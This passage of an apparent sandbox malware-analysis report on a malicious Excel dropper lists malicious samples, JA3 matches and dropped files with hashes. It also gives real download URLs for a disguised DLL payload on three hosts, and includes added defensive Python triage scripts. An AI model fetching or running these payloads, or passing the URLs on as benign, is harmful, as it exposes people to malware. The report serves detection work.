• User Credentials.doc (malicious); context: 103.212.121.59
• E-Statement.exe (malicious); context: 103.212.121.190
• CV_SrinivasaBabuAdhikari.pdf.exe (malicious); context: 103.212.121.190
• STS CARGO SHIPMENT.exe (malicious); context: 103.212.121.190
• HSBC Payment Advice.exe (malicious); context: 103.212.121.190
• 990109.exe (malicious); context: 150.242.140.16
• https://upinsmokebatonrouge.com/var/kZKk4S0XnGUwc0OKsia1/ (malicious); context: 103.86.176.8
• Document-63665398-12152020.xls (malicious); context: 43.240.64.184
• Za1rZVzIOp.xls (malicious); context: 103.251.24.140
• document-837747519.xls (malicious); context: 43.241.71.20
• document-837747519.xls (malicious); context: 43.241.71.20
• SecuriteInfo.com.Trojan.Packed2.41837.21003.exe (malicious); context: 150.242.14.61
• Smpp Route.exe (malicious); context: 150.242.14.61
• Inv.exe (malicious); context: 103.119.239.28
• http://technoraga.com/Doc.htm (malicious); context: 103.212.121.61
• z865yM9Ehy.exe (malicious); context: 150.242.14.61
• kvdYhqN3Nh.exe (malicious); context: 150.242.140.16
• intelgraphics.exe (malicious); context: 150.242.14.61
• Quotation.exe (malicious); context: 103.86.177.235

                                                                                JA3 Fingerprints

Match: associated sample name or URL (detection); context
Match: eb88d0b3e1961a0562f006e5ce2a0b87
• Statement of Account as of 01_20_2021.xlsm (malicious); context: 194.225.58.214
• sample20210120-01.xlsm (malicious); context: 194.225.58.214
• sample20210113-01.xlsm (malicious); context: 194.225.58.214
• INV8222874744_20210111490395.xlsm (malicious); context: 194.225.58.214
• Inv0209966048-20210111075675.xls (malicious); context: 194.225.58.214
• INV2680371456-20210111889374.xlsm (malicious); context: 194.225.58.214
• INV8073565781-20210111319595.xlsm (malicious); context: 194.225.58.214
• INV3867196801-20210111675616.xlsm (malicious); context: 194.225.58.214
• INV9698791470-20210111920647.xlsm (malicious); context: 194.225.58.214
• INV7693947099-20210111388211.xlsm (malicious); context: 194.225.58.214
• Document74269.xls (malicious); context: 194.225.58.214
• Document74269.xls (malicious); context: 194.225.58.214
• 1 Total New Invoices-Monday December 14 2020.xls (malicious); context: 194.225.58.214
• 1 Total New Invoices-Monday December 14 2020.xlsm (malicious); context: 194.225.58.214
• 1 Total New Invoices-Monday December 14 2020.xlsm (malicious); context: 194.225.58.214
• 1 Total New Invoices-Monday December 14 2020.xlsm (malicious); context: 194.225.58.214
• 1-Total New Invoices Monday Dec 14 2020.xlsm (malicious); context: 194.225.58.214
• 1 Total New Invoices-Monday December 14 2020.xlsm (malicious); context: 194.225.58.214
• 1 Total New Invoices-Monday December 14 2020.xlsm (malicious); context: 194.225.58.214
• SecuriteInfo.com.Heur.15645.xlsm (malicious); context: 194.225.58.214

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                Category:dropped
                                                                                Size (bytes):58936
                                                                                Entropy (8bit):7.994797855729196
                                                                                Encrypted:true
                                                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                Malicious:false
                                                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):326
                                                                                Entropy (8bit):3.117051994467751
                                                                                Encrypted:false
                                                                                SSDEEP:6:kKlSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:vkPlE99SNxAhUegeT2
                                                                                MD5:18297D8D972221483A5990B196BF346D
                                                                                SHA1:94EA32F361519D232CA0EFB24CB00B1DA69D323A
                                                                                SHA-256:C7D7F93946851BBEEACF2C066FEF131154F407F32E270F1AC3EC3DDCD2ABF59F
                                                                                SHA-512:A7B551675C156D0AB617C19B6B63406927A981D6090EA9345D1E73391F6DBC59CAEB2D83F653C387AED97542A85B1DB2138777C4C947A0BF50D25D3247A313AA
                                                                                Malicious:false
                                                                                Preview: p...... ................(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
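The MetaData entry above is not attacker infrastructure: the UTF-16LE string in its preview is the URL of Microsoft's automatic root-certificate (CTL) update, http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab, followed by its ETag. Files under CryptnetUrlCache are written by the Windows crypto stack (CryptRetrieveObjectByUrl) when it fetches a CTL, CRL or AIA object during certificate-chain building, which is why regsvr32.exe shows up as the writing process here. When pulling indicators out of this report, that host should be separated from the real download hosts listed in the entries that follow. The helper below is an added example, not part of the sandbox report: it recovers UTF-16LE strings from such a blob and tags URLs on known Windows PKI hosts. SAMPLE_BLOB is constructed from the preview above (only the layout header, URL, NUL, ETag is modelled), and WINDOWS_PKI_HOSTS is an assumption, a partial list to be extended for a given environment.

```python
"""Recover the URL recorded in a CryptnetUrlCache MetaData blob.

Added example for this report (not Joe Sandbox code). The Windows crypto stack
writes these MetaData files when CryptRetrieveObjectByUrl fetches a CTL, CRL or
AIA object and stores the fetched URL as UTF-16LE. SAMPLE_BLOB is constructed
from the report's preview: a short binary header, the URL, a NUL terminator and
the ETag that follows it. WINDOWS_PKI_HOSTS is an assumption (a partial list).
"""
import re
from urllib.parse import urlparse

CTL_URL = ("http://ctldl.windowsupdate.com/msdownload/update/v3/static/"
           "trustedr/en/authrootstl.cab")

# Constructed stand-in for the 326-byte MetaData file; only the layout
# 'header, UTF-16LE URL, NUL, UTF-16LE ETag' is modelled.
SAMPLE_BLOB = (
    bytes.fromhex("70000000000000002000") + bytes(40)
    + CTL_URL.encode("utf-16-le") + b"\x00\x00"
    + '"069559e2a0d61:0"'.encode("utf-16-le") + b"\x00\x00"
)

# Hosts contacted by Windows' own root-certificate (CTL) update mechanism.
WINDOWS_PKI_HOSTS = {"ctldl.windowsupdate.com"}  # assumption: extend as needed

_URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def utf16le_strings(blob, min_len=8):
    """Return runs of >= min_len printable ASCII chars encoded as UTF-16LE."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group(0).decode("utf-16-le") for m in pattern.finditer(blob)]


def extract_urls(blob):
    """All http(s) URLs found inside the blob's UTF-16LE strings."""
    urls = []
    for s in utf16le_strings(blob):
        urls.extend(_URL_RE.findall(s))
    return urls


def classify_url(url):
    """'windows-pki-noise' for Windows' own CTL/CRL fetches, else 'needs-review'."""
    host = (urlparse(url).hostname or "").lower()
    return "windows-pki-noise" if host in WINDOWS_PKI_HOSTS else "needs-review"


if __name__ == "__main__":
    for u in extract_urls(SAMPLE_BLOB):
        print(classify_url(u), u)
```

The same string scan works on the raw MetaData file from a disk image (`strings -el` gives the same runs); the point of the allow-list is to keep the CTL fetch out of the indicator set while every other URL, such as the download hosts in the entries below, still lands in the review queue.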
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\suspendedpage[1].htm
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:HTML document, ASCII text, with very long lines
                                                                                Category:downloaded
                                                                                Size (bytes):7614
                                                                                Entropy (8bit):5.642774657070028
                                                                                Encrypted:false
                                                                                SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJyB:QJvVGaRF8I84
                                                                                MD5:7D326EC20489C8098EB61BD74AB3EBA0
                                                                                SHA1:6395954055C2D6CD5275F0317B989BCAB05A36CA
                                                                                SHA-256:D6778D9798302215E44B3E65F8F201AEE15C57F71D9F4100F96C23B55CD56B9A
                                                                                SHA-512:DEE3A98C08E257E3D1D151360C2E00175807D1199AB761D04442DB8A6DD32650482EBEBCA95F88CA9C84458C2D7EB71AB7C63F3EC98990930B642C22B3954DAD
                                                                                Malicious:false
                                                                                IE Cache URL:http://laureys.be/cgi-sys/suspendedpage.cgi
                                                                                Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):12310
                                                                                Entropy (8bit):6.535237890734359
                                                                                Encrypted:false
                                                                                SSDEEP:384:MJJgczFIb+vyYLB3oUm3ZmHGyd4gi12tI4:KFIbAB39m3Zmp+x12n
                                                                                MD5:DF5ADB39B1173368D4D28069342A8E5F
                                                                                SHA1:B3D1414D5E487FC2D9A926A902E6D7C89D5C98CE
                                                                                SHA-256:BA3C345884A8FD7FEF0111D9F7AE4C034C2D9D767E3D59A11F13671535610A0F
                                                                                SHA-512:A816DCA29C64589BB84EBDC7733F3BA3B175B91E8226E7DD52CC2B33DB2119547E3FA0F2DC32338EA3707209D8CDF269A0E8D3EDA3A90B8253672FB21E6D5207
                                                                                Malicious:true
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......15Q!uT?ruT?ruT?r...rtT?rx..rwT?rx..rtT?rx..rzT?rx..rwT?r...rvT?ruT>r<T?rx..rtT?rx..rzT?rx..rtT?rx..rtT?rRichuT?r........PE..L......R...........!.....d...........o....................................................@.........................`r..M...\q..<...................................`...8...........................(...@............p..\............................text....b.......d.................. ..`.data................h..............@....idata.. ....p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:downloaded
                                                                                Size (bytes):765440
                                                                                Entropy (8bit):6.0875108403853675
                                                                                Encrypted:false
                                                                                SSDEEP:12288:F0q2AejP0XbOAQ60af2rDMmUz0x07wGwefo5SuDwadeUy:i2ejIOU0G2rDMmxxkRTs9y
                                                                                MD5:92AA183E338E9F7BBDC9CA401EB97C64
                                                                                SHA1:E45D05BF840341FBAA6FD6B9F396788C5810CB26
                                                                                SHA-256:791252FC4DEF3C4C3BDB270633FFC88C0E2CD8E8E8BA299825A83841A273E7DD
                                                                                SHA-512:EB08528C5E3DD47AE6DDC6F79BC7BBD035701F46B0845D5A90015E3FBA77634E614BB866C6EDA9F0AEC9ED06D8344B038EA56635A7214F2378D3F73B72EF2998
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                IE Cache URL:http://cms.ivpr.org/by9zwa7p1.zip
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......15Q!uT?ruT?ruT?r...rtT?rx..rwT?rx..rtT?rx..rzT?rx..rwT?r...rvT?ruT>r<T?rx..rtT?rx..rzT?rx..rtT?rx..rtT?rRichuT?r........PE..L......R...........!.....d...........o....................................................@.........................`r..M...\q..<...................................`...8...........................(...@............p..\............................text....b.......d.................. ..`.data................h..............@....idata.. ....p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:downloaded
                                                                                Size (bytes):765440
                                                                                Entropy (8bit):6.0875108403853675
                                                                                Encrypted:false
                                                                                SSDEEP:12288:F0q2AejP0XbOAQ60af2rDMmUz0x07wGwefo5SuDwadeUy:i2ejIOU0G2rDMmxxkRTs9y
                                                                                MD5:92AA183E338E9F7BBDC9CA401EB97C64
                                                                                SHA1:E45D05BF840341FBAA6FD6B9F396788C5810CB26
                                                                                SHA-256:791252FC4DEF3C4C3BDB270633FFC88C0E2CD8E8E8BA299825A83841A273E7DD
                                                                                SHA-512:EB08528C5E3DD47AE6DDC6F79BC7BBD035701F46B0845D5A90015E3FBA77634E614BB866C6EDA9F0AEC9ED06D8344B038EA56635A7214F2378D3F73B72EF2998
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                IE Cache URL:http://artec.com.tr/xkpffwn.zip
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......15Q!uT?ruT?ruT?r...rtT?rx..rwT?rx..rtT?rx..rzT?rx..rwT?r...rvT?ruT>r<T?rx..rtT?rx..rzT?rx..rtT?rx..rtT?rRichuT?r........PE..L......R...........!.....d...........o....................................................@.........................`r..M...\q..<...................................`...8...........................(...@............p..\............................text....b.......d.................. ..`.data................h..............@....idata.. ....p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:downloaded
                                                                                Size (bytes):765440
                                                                                Entropy (8bit):6.0875108403853675
                                                                                Encrypted:false
                                                                                SSDEEP:12288:F0q2AejP0XbOAQ60af2rDMmUz0x07wGwefo5SuDwadeUy:i2ejIOU0G2rDMmxxkRTs9y
                                                                                MD5:92AA183E338E9F7BBDC9CA401EB97C64
                                                                                SHA1:E45D05BF840341FBAA6FD6B9F396788C5810CB26
                                                                                SHA-256:791252FC4DEF3C4C3BDB270633FFC88C0E2CD8E8E8BA299825A83841A273E7DD
                                                                                SHA-512:EB08528C5E3DD47AE6DDC6F79BC7BBD035701F46B0845D5A90015E3FBA77634E614BB866C6EDA9F0AEC9ED06D8344B038EA56635A7214F2378D3F73B72EF2998
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                IE Cache URL:http://monitrade.net/h79fwesfe.rar
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......15Q!uT?ruT?ruT?r...rtT?rx..rwT?rx..rtT?rx..rzT?rx..rwT?r...rvT?ruT>r<T?rx..rtT?rx..rzT?rx..rtT?rx..rtT?rRichuT?r........PE..L......R...........!.....d...........o....................................................@.........................`r..M...\q..<...................................`...8...........................(...@............p..\............................text....b.......d.................. ..`.data................h..............@....idata.. ....p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
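Two patterns in the entries above deserve a mechanical check rather than a glance. First, every PE DLL written by EXCEL.EXE carries a .zip or .rar extension while its preview starts with an MZ header, which is what the "Drops files with a non-matching file extension" signature in the overview refers to. Second, by9zwa7p1[1].zip, xkpffwn[1].zip and h79fwesfe[1].rar have identical size and hashes (SHA-256 791252FC...) but were fetched from three different hosts (cms.ivpr.org, artec.com.tr, monitrade.net): one payload staged redundantly, so blocking a single URL is not enough. The script below is an added example, not Joe Sandbox code, and runs both checks over a dropped-files list. SAMPLE_RECORDS is constructed: the paths, process names and URLs mirror the report, but the file bytes are minimal stand-ins (a bare MZ header, a PNG header, a CAB header), so sizes and hashes do not match the report's values.

```python
"""Triage a sandbox 'dropped files' list for two patterns: files whose content
does not match their extension, and one payload served under several names
from several hosts.

Added example for this report, not Joe Sandbox code. SAMPLE_RECORDS is
constructed: paths, process names and URLs mirror the report, but the file
bytes are minimal stand-ins (a bare MZ/PE header, a PNG header, a CAB header),
so sizes and hashes do not match the report's values.
"""
import hashlib
from collections import defaultdict

MAGIC = [  # (leading bytes, real content kind)
    (b"MZ", "pe"),
    (b"PK\x03\x04", "zip"),
    (b"Rar!\x1a\x07", "rar"),
    (b"MSCF", "cab"),
    (b"\x89PNG\r\n\x1a\n", "png"),
]
EXT_CLAIMS = {".zip": "zip", ".rar": "rar", ".cab": "cab", ".png": "png",
              ".dll": "pe", ".exe": "pe"}
OFFICE_PROCS = {"EXCEL.EXE", "WINWORD.EXE", "POWERPNT.EXE"}

EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
REGSVR = r"C:\Windows\SysWOW64\regsvr32.exe"
IE5 = r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5"

PE_STUB = b"MZ\x90\x00" + bytes(60) + b"PE\x00\x00"   # constructed, not a real DLL
LOADER = PE_STUB + bytes(16)          # stands in for the 12310-byte ylztwx DLL
PAYLOAD = PE_STUB + b"\x01" * 32      # stands in for the 765440-byte DLL

SAMPLE_RECORDS = [
    {"path": IE5 + r"\5JC0A1KN\ylztwx[1].rar", "process": EXCEL, "url": None, "data": LOADER},
    {"path": IE5 + r"\T4O403JZ\by9zwa7p1[1].zip", "process": EXCEL,
     "url": "http://cms.ivpr.org/by9zwa7p1.zip", "data": PAYLOAD},
    {"path": IE5 + r"\XNHC0JWC\xkpffwn[1].zip", "process": EXCEL,
     "url": "http://artec.com.tr/xkpffwn.zip", "data": PAYLOAD},
    {"path": IE5 + r"\ZAE7RW1P\h79fwesfe[1].rar", "process": EXCEL,
     "url": "http://monitrade.net/h79fwesfe.rar", "data": PAYLOAD},
    {"path": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2F6E8C4.png",
     "process": EXCEL, "url": None, "data": b"\x89PNG\r\n\x1a\n" + bytes(8)},
    {"path": r"C:\Users\user\AppData\Local\Temp\CabF789.tmp", "process": REGSVR,
     "url": None, "data": b"MSCF" + bytes(32)},
]


def win_basename(path):
    """basename for Windows paths regardless of the host OS."""
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def sniff(data):
    """Content kind from leading magic bytes ('unknown' if none match)."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def triage(records):
    findings = []
    by_hash = defaultdict(list)
    for r in records:
        name = win_basename(r["path"])
        ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
        kind = sniff(r["data"])
        claimed = EXT_CLAIMS.get(ext)
        by_hash[hashlib.sha256(r["data"]).hexdigest()].append(r)
        if claimed and claimed != kind:
            findings.append({"rule": "ext-mismatch", "subject": name,
                             "detail": f"{ext} claims {claimed}, content is {kind}"})
        if kind == "pe" and win_basename(r["process"]).upper() in OFFICE_PROCS:
            findings.append({"rule": "office-dropped-pe", "subject": name,
                             "detail": win_basename(r["process"])})
    # One hash reachable through several URLs: the same payload staged on
    # redundant hosts, so block/hunt on the hash and every host, not one URL.
    for digest, rs in by_hash.items():
        urls = sorted({r["url"] for r in rs if r["url"]})
        if len(urls) > 1:
            findings.append({"rule": "multi-host-payload", "subject": digest,
                             "detail": urls})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f["rule"], f["subject"], f["detail"])
```

On the report's real data the same logic yields four ext-mismatch findings, four office-dropped-pe findings and one multi-host-payload finding covering the three download hosts; the Content.MSO images and the regsvr32 CAB drop produce nothing, which is the intended separation between payload and Office/Windows housekeeping files.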
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2F6E8C4.png
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PNG image data, 699 x 298, 8-bit colormap, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):5737
                                                                                Entropy (8bit):7.823093930699959
                                                                                Encrypted:false
                                                                                SSDEEP:96:/pzh0Wk1Doo3NH1xHvMYXyCa/BY8/CRApdM1f4EkiaaaaaaomB8DIx7GpHWdQ95C://0N06xP1yCa/+8/CyM1fJkiaaaaaar/
                                                                                MD5:32BAB8AD09773064F93EBD99958580EC
                                                                                SHA1:9DE1C4B468E6D74CFF7A944601F4FF6D257E6C84
                                                                                SHA-256:4D4AE615AFDFF15B86FB39B8E591E65673B807AE1D0109AF287AD3B74136E514
                                                                                SHA-512:39E928812465920356513DA67519E9F2A91B1767BB4AC515DA1BADE76885274834AA1A7FCA78768A2A1E01197C59886D0CF89EF2313DC7E6C3271629F1A90800
                                                                                Malicious:false
                                                                                Preview: .PNG........IHDR.......*....."oh.....tEXtSoftware.Adobe ImageReadyq.e<...0PLTE.............u..........t.....dk......QQQyyz........IDATx..b.0.D....r.....9..,gI.......K..Y.?...B..t..>..)....~.v.I[.|..|.v..mL.^HJ..$.viQ.>...).-.BZ...E.I.]Z....-J.gj._,d...n...-..j...@}[gj..Z2M.Zt...!.z.tL...&...i.LE..zsN.......-..-.?.!.z...v..G_....:i>.....k.;.x...v...?X..Y._.$.9.v-9cWn..*.M.....qG.R..z......g..G..lV..e.?...c.c..t.c.U....i.e.,..)_.%...W.u*.e.....z.....b]6.._.I.lQ..tL..v..'pT>.|o7l.Z...P...}.t..j..w5.. /WKI........J.nP....=.NR....f..t..w.._}..e........?~..N...]&.q6.p.,?..F....w........V..7.J...5)I'Kz....bwI....x..+.....I~6kw.q.~.%m......tU......z..6..{..o+.@...T.c..2..t..'.u.^R.MJ./.7...KT>^..j....j[..+..Ni..;./Y.%[Z.m...U..X...'=..r..v:.6....\.OZ.O...Y.....;.YK......II:w._.nY.85#.mS.....a.r..ep.W....R../..3'....go.....Y..S.Q.D....w...c...o.EI:g._.5..%-....:|....;...,E.uW.......?..h....;,J.....T..],..w9G..E...&.D...thr).....N.....$.9..
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCA4260F.png
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PNG image data, 114 x 98, 8-bit colormap, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):3119
                                                                                Entropy (8bit):7.810693367525396
                                                                                Encrypted:false
                                                                                SSDEEP:48:7ki5Nxsg2IqnSTJZi8G+vJeKCtWOLcCeX5cJw4oeSsP9SqXDA32Nkq1lxht:7ki5NxAInjG+kKfF/4EmND8Uk+xP
                                                                                MD5:98DFB630470988A5BD9D129F24CE30FA
                                                                                SHA1:13173C493DC38AFB982EB060F24F1BB7936A752B
                                                                                SHA-256:22328705665F71B26B7E15ECB6D7E9794002F4B2432DF692278CC559650953D6
                                                                                SHA-512:E999272141FD04B48268138A25943640760E45DA654283A7A64929C21C04859F6CC89BA4A79456F5F75439966E616D33CF34FABA5485D9D2F54E0A254CEDCC8D
                                                                                Malicious:false
                                                                                Preview: .PNG........IHDR...r...b.......w.....sRGB.........gAMA......a.....PLTE.........``PPP@00 @@@.........pp````.........00.@@.... .``.............. ....PPP...........p......... .....pp....ppp...00. .pp. .......... ...@P.............PP.0 .. . @@.000P@.0@0............``..........@@ .... ..........ItRNS............................................................................U....pHYs..........o.d....IDAThC.Z.{.:..^x.......A..4...........@D!\.=...j.3Lf..d......N.+...=.rFO...n.3k..y.G...m..*.H;...'....FE.9.C9.45m...|g..]..k...?'0..~6....Nm.[..*.\.j.....[......M..j.N:?...A........v.d*N...47...@.R..KT1....[.^..e....t.VI.8.fp[|..P>>..P=)...e0._|.z.>.o@..|.Z...?..}..........5..............n.....s..y5.\..7...#jd>.....Kh.a).1...u..|..=..%...g..W....1.R.CO.{.>s%........*....>..^T.... .".....&0.n.......:.....h./...3WB.X...-.5.x..1..ID.......(R.X....B`....-...'.W.7f...}...Cr.C.x..<...^....[6k)x...x&.s.....Z...[>A.wVB..F=|R...B...y....h\X...e.L..... .6...3l..>.>..
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7A618C6.emf
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                Category:dropped
                                                                                Size (bytes):2352
                                                                                Entropy (8bit):2.843492352371811
                                                                                Encrypted:false
                                                                                SSDEEP:24:YgelY0cSOKNHoKNpJSVvb+rLDkcmBSmkDVZWIHFm+rlzGDLpEn:v0O+I+rSVSciDVZvk+xCDL6
                                                                                MD5:02DE6899749BC90C8436783A76485FE5
                                                                                SHA1:D7D91A77F61E69EC6F152E3CDE9C0A55AF8CF069
                                                                                SHA-256:5A6AD5DD29DAC89DDF7D058B243B6CAA122A0C6FAC2B9FB5F853FD49E47D4D5E
                                                                                SHA-512:72CA635DBD1A8D200B62D021B1C5D7E787B19618DE978C6ABF7F2F7BAA32428840053B4874E30225EFA6BB425B4AE50E3FADF8FCF818D09319F28B2D23C94CB3
                                                                                Malicious:false
                                                                                Preview: ....l................................... EMF....0...(.......................`...1........................|..F...(.......GDIC..........................................................................................-.........!.............................-...................................-.........!.........................$.............................-.......................................$.............................-...............-.........!...............-...........................Calibri........J.....v!;............-...........................2.................1........................"System.).......B....................-.......'.......................................................................................!.......'.......................%...........L...d...................................!..............?...........?................................'.......................%...........................................................%...........L...d...................
                                                                                C:\Users\user\AppData\Local\Temp\780F0000
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):54593
                                                                                Entropy (8bit):7.809761757134018
                                                                                Encrypted:false
                                                                                SSDEEP:1536:Xp7RRUsqW5baZAqO6ZmYWNFtu+y5M9PF9GqcBre9OZ:XpfeZAhWKuOoiK
                                                                                MD5:0F8207B106153E236B13299853CDBA86
                                                                                SHA1:7CC5BAB94F668A25E71B6DFA6A6DA9F3E680CF9E
                                                                                SHA-256:52A295D89BAD2B935B882EE30A6FCAAB804D1AEF5DA7DA39BC381D00DD59EC99
                                                                                SHA-512:9B4700C3A9CDB42A95C5649717AF8E3DDB08E63E20B675CBF25A2635E4A4C5BEE239592A46769C3C9AB15B89F4CB4911F3F58FA1606BD47673F8992CF7BB2906
                                                                                Malicious:false
                                                                                Preview: ...n.0.E.......D'..(,g..4@R.[..I....(..w(9N..a...E.{f.....I....sr..H...B.*'?....I.....FCN.........OP.}N....J=.A1....WJ.....U.2.c......F..!..l.7P.'....o..l.&........V....J.].@RS..Ca..B..[...5@P2.N .=@...'t.iuu..*....+@...6.+.....fR.}.2Tv..ZX....!....I.|.Q...3V8....*'.H..wL...V.g.v[cv.t...|.-..u.)...l+.../%.!u.wRO.....z)..]0.nK.y{......&..s.....{......>.....:...}.K.g..4.mc.M..5sP<.lb....O.8..p{z...u?..p......p=.......A..1?..BL4.f....<dK._ec.8...z....../.%.S.F....l.j.G".....).q..P..i..c........PK..........!.aQ._............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\CabF789.tmp
                                                                                Process:C:\Windows\SysWOW64\regsvr32.exe
